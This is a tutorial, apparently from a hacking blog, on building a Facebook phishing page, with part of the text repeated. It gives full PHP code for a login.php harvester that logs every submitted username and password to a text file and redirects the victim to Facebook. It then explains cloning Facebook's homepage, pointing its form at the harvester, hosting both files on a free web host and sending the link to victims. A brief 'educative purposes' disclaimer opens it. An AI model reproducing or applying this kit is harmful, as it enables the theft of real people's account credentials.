Note: Phishing is illegal. This tutorial is only for educative purposes.
Well firstly i will be breifing what phishing is for those who are currently unaware of it.
According to Wikipedia, Phishing is attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.
In facebook phishing, the attacker creates a fake page resembling Facebook.com where victims enter their passwords and id's in order to login. By the time the page loads and redirects the victim to the original facebook page, his/her password and id gets saved in the attackers web server.
Now we will go straight into the tutorial segment.
Well we will be actually needing two files in this whole tutorial
1. A php file called login.php. This php file plays the cheif role in extracting and storing the password.
2. Index.html which is the edited fake page and is very similar to the original fb homepage.
Open the .html\.htm file you just downloaded, using notepad and go to Edit>Find and type in the search box:
method="post" and press Find.
When the searched keyword is shown, notice that just before it, there is something written like: action="www.facebook.............". Replace the text within the quotes with login.php.(See the Image)
Bingo !! Your Phishing page is now ready !
For this tutorial, I will be using www.000webhost.com.
a. Firstly go to the site and signup for a free account.
b. After you have created your account, go to Control Panel>File Manager.
c. Navigate and go to the root folder and delete if you find any pre-existing files.
d. Now click "Upload" and select the two files, namely index.html and login.php
e. Now copy the link of sub-domain you selected while registering for the hosting account and give it to the victim. Whenever someone tries to login through your phishing page, the username and password is saved in a text file in your file manager(see step b).
Well I also included a video tutorial for those who are still not very sure about the steps:
According to Wikipedia, Phishing is attempting to acquire information such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication.
In facebook phishing, the attacker creates a fake page resembling Facebook.com where victims enter their passwords and id's in order to login. By the time the page loads and redirects the victim to the original facebook page, his/her password and id gets saved in the attackers web server.
Now we will go straight into the tutorial segment.
Well we will be actually needing two files in this whole tutorial
1. A php file called login.php. This php file plays the cheif role in extracting and storing the password.
2. Index.html which is the edited fake page and is very similar to the original fb homepage.
Step 1. Creating the php file
Open notepad and paste the following lines there... and save it with name login.php
<?php
header ('Location: http://www.facebook.com/appcenter');
$handle = fopen("facebook.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Step 2.Creating Index.html Page
Firstly open Facebook.com in your browser. After it loads completely, save it to a folder.Open the .html\.htm file you just downloaded, using notepad and go to Edit>Find and type in the search box:
method="post" and press Find.
When the searched keyword is shown, notice that just before it, there is something written like: action="www.facebook.............". Replace the text within the quotes with login.php.(See the Image)
Bingo !! Your Phishing page is now ready !
Step 3. Uploading Files to Free Web Hosting
Now you have to upload the above mentioned files in an online web hosting provider.For this tutorial, I will be using www.000webhost.com.
a. Firstly go to the site and signup for a free account.
b. After you have created your account, go to Control Panel>File Manager.
c. Navigate and go to the root folder and delete if you find any pre-existing files.
d. Now click "Upload" and select the two files, namely index.html and login.php
~~ Now you are ready to strike ~~
Well I also included a video tutorial for those who are still not very sure about the steps: